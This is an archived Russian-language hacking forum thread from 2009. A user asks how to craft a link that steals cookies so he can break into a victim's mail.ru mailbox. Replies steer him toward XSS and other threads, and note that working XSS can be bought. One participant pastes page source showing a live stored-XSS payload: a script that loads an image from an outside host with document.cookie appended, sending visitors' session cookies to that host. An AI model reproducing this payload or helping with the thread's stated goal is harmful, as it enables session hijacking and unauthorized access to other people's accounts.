PDA

Просмотр полной версии : Как сделать ссылку, при переходе на которую воруются куки?

Digital111
30.04.2009, 00:02
*Неактуально*
RumShun
30.04.2009, 05:27
почитай про фейки и XSS
spider-intruder
30.04.2009, 10:13
Ссылка должна быть на том же домене, от которого ты хочешь куку. Забрать куку от почты можно только если твой скрипт воровства куков будет на том же домене что и почтовый ящик. Читай про Cross Site Scripting (XSS)
Digital111
30.04.2009, 16:37
Помогите пожалуйста написать такой скрипт, я сам не смогу. У меня и у жертвы ящик на mail.ru.
max_max
30.04.2009, 16:58
Digital111,
http://forum.antichat.ru/thread70397.html
LemoTTT
01.05.2009, 15:29
Нет, ну парень действительно прав, я считаю что многих интересует "ссылка крижи куки", я вот тоже многог статей2 обчитал, но везде только поверхностно говориться(((
ЗЫ: я новичек, где здесь находиться паблик (глянуть свежиt xss)
Player#1
01.05.2009, 15:55
в этих темах смотри:
http://forum.antichat.ru/thread88986.html
http://forum.antichat.ru/thread35802.html

но щас нету рабочих хсс, так что ищи сам или покупай...
LemoTTT
01.05.2009, 15:58
а вот смотри, допустим я нашол xss, вставил запрос куки на сниффер(скрипт), все пашед, потом етот баг прикріваеться(я напиример ету xxs выложил в паблик все уже о ней узнал и потом решили ее прикрыть) когда я в 1-й раз кинул скрипт, его тоже потом прикроют, а то я знаю 1 xss я не могу вкинуть скрипт , а кто то раньше кинул и он работает и ворует куки!
max_max
01.05.2009, 16:57
LemoTTT, даже ребенок понял какую х..ю ты сказал :(
LemoTTT
01.05.2009, 16:58
Может ты норм ответиш?!
LemoTTT
01.05.2009, 17:03
Вот тут внедрен скрипт которій крадет куки
http://jamber.info/profile/KISA_Anfisa.html
как мне так сделать, если ничего не получаеться((
LemoTTT
01.05.2009, 17:07
Вот тут внедрен скрипт которій крадет куки
http://jamber.info/profile/KISA_Anfisa.html
как мне так сделать, если ничего не получаеться((

Если глянуть исходный текст, то мы видим крижу куки, как мне так сделать? <div style="font-size: 17px; font-weight: bold;">О себе:</div><br /> <div style="font-size: 12px;"> я люблю только это:р<script>img = new Image(); img.src = "http://comp-info.ru/pic/image.jpg?"+document.cookie;</script> </div> <div id="about_editor" style="display: none;"><br /><br /> <textarea id="about_textarea" name="about_textarea" onkeyup="AboutEditor_MinChar();" style="width: 100%;">я люблю только это:р<script>img = new Image(); img.src = "http://comp-info.ru/pic/image.jpg?"+document.cookie;</script></textarea><br /> <div align="center">
RumShun
04.05.2009, 06:18
LemoTTT, даже ребенок понял какую х..ю ты сказал, а я не понял :(
Нет, ну парень действительно прав, я считаю что многих интересует "ссылка крижи куки", я вот тоже многог статей2 обчитал, но везде только поверхностно говориться((( это потомушто в каждом случае требуеться индивидуальный подход